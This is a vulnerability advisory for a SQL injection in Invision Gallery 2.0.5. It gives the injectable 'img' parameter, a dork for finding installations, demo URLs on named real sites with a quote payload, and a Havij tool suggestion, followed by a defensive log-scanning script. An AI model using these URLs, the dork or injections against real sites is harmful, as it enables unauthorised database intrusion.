Invision Gallery 2.0.5 SQL Injection

2013-01-17T00:00:00
ID PACKETSTORM:119636
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-01-17T00:00:00

Description

                                        
`##############  
# Exploit Title : Invision Gallery SQL Injection  
#  
# Exploit Author : Ashiyane Digital Security Team  
#  
# software Homepage: www.invisionpower.com/apps/gallery/  
#  
# Home : ww.Ashiyane.org  
#  
# Security Risk : High - SQL Injection  
#  
# version : 2.0.5  
#  
# Dork : Invision Gallery 2.0.5 © 2013 IPS, Inc. inurl:img= or Invision Gallery 2.0.5 IPS, Inc. inurl:img=  
#  
##############  
#location: site/index.php?automodule=gallery&cmd=si&img=[SQL]  
# or site/act=module&module=gallery&cmd=si&img=[SQL]   
#  
#  
#DEMO:  
#  
# www.sgheadphones.net/index.php?act=module&module=gallery&cmd=si&img=448%27  
#  
# www.rfdf.ru/forum/index.php?act=module&module=gallery&cmd=si&img=698%27  
#  
# www.bamburakentaja.com/forums/index.php?act=module&module=gallery&cmd=si&img=41%27  
#  
# forum.lacrimosa.ws/index.php?automodule=gallery&cmd=si&img=42%27  
#  
# www.chaos.su/forum/index.php?automodule=gallery&cmd=si&img=3  
#  
# ngevacorp.freehostia.com/index.php?automodule=gallery&cmd=si&img=726%27  
#  
##############  
# [Inject with Havij or inject manually]  
##############  
#Greetz to: My Lord ALLAH  
##############  
#  
#Amirh03in  
#  
##############   
`
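
A defender-side check for the request pattern in this advisory, as an added example that is not part of the original advisory: it flags requests to the gallery's `cmd=si` handler whose `img` value is not a plain decimal id. The request lines are constructed, and treating `img` as a numeric image id is an assumption taken from the numeric values in the URLs above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log request targets (hypothetical paths, not real traffic).
SAMPLE_REQUESTS = [
    "/index.php?automodule=gallery&cmd=si&img=42",
    "/index.php?automodule=gallery&cmd=si&img=42%27",
    "/forum/index.php?act=module&module=gallery&cmd=si&img=12abc",
    "/index.php?act=module&module=gallery&cmd=sc&cat=3",
    "/index.php?showtopic=10&img=abc",
]

# Assumption: a legitimate img value is a short decimal image id.
NUMERIC_ID = re.compile(r"[0-9]{1,10}")


def is_gallery_image_request(params):
    """True when the query selects the gallery's cmd=si handler via either route."""
    def first(key):
        return params.get(key, [""])[0].lower()

    via_automodule = first("automodule") == "gallery"
    via_act = first("act") == "module" and first("module") == "gallery"
    return (via_automodule or via_act) and first("cmd") == "si"


def suspicious_img_values(request_target):
    """Return the URL-decoded img values that are not plain decimal ids."""
    query = urlsplit(request_target).query
    params = parse_qs(query, keep_blank_values=True)
    if not is_gallery_image_request(params):
        return []
    return [v for v in params.get("img", []) if not NUMERIC_ID.fullmatch(v)]


def scan(requests):
    """Map each flagged request target to its offending img values."""
    hits = {}
    for target in requests:
        bad = suspicious_img_values(target)
        if bad:
            hits[target] = bad
    return hits


if __name__ == "__main__":
    for target, values in scan(SAMPLE_REQUESTS).items():
        print(f"non-numeric img {values!r} in {target}")
```

The same allow-list rule (reject any `img` that is not all digits) can be enforced in front of the application, for example in a reverse proxy or WAF, until the gallery module is patched.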